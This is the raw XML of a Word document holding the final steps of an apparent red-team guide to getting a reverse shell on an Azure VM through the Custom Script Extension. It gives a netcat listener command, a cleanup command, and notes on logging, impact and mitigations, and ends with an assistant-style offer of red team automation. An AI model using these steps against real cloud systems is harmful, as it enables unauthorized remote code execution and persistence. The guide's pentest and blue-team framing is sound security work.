          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C87E90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🧼</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Catch the Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AC38A6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Start a listener on your attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17060615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nc -lvnp &lt;ATTACKER_PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D241BEF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Once the extension runs, the VM will connect back to your listener and provide a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D508487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394BF7A1">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F90DAE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t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cleanup (Optional for Blue Team Ops)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E8F80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To clean up the extension:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5523D952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az vm extension delete \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5504FE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--resource-group &lt;RESOURCE_GROUP&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD6049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--vm-name &lt;VM_NAME&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0153AC76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 xml:space="preserve">  --name CustomScriptExtension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020BD97A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3267BD32">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA2D00D" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notes for PenTest Reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50144093" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Log activity in AzureActivity logs under Microsoft.Compute/virtualMachines/extensions/write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE1B49" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Potential impact: SYSTEM-level code execution, lateral movement, persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36699371" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Mitigations: Least privilege RBAC, deny policy on Custom Script Extension, trusted script hosting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4A1A50" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="50D20712">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E034BF" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRPr="00B92848" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B92848">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Would you like a Linux variant, or an ARM template version for red team automation?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18545A62" w14:textId="77777777" w:rsidR="00EF24C0" w:rsidRDefault="00EF24C0" w:rsidP="00EF24C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E21204A" w14:textId="77777777" w:rsidR="00F41B33" w:rsidRDefault="00F41B33"/>
    <w:sectPr w:rsidR="00F41B33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A46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22A6A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C59AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30F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C6320"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A2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F81869"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4F3C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262561">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2117867909">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1390954126">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="135183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4C0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1A2F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0087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0F9A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1819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EF24C0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AA9B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF879F42-CCBF-47A0-BF8A-150264E0C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4C0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:kern w:val="0"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia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1A2F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060"/>
      <w:kern w:val="2"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="28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4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4C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4C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4C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4C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A2F"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="002060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4C0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22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4C0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22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4C0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22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4C0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22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4C0"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22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4C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4C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EF24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4C0"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00EF2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4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4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4C0"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="22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EF24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2026-04-06T11:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T11:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>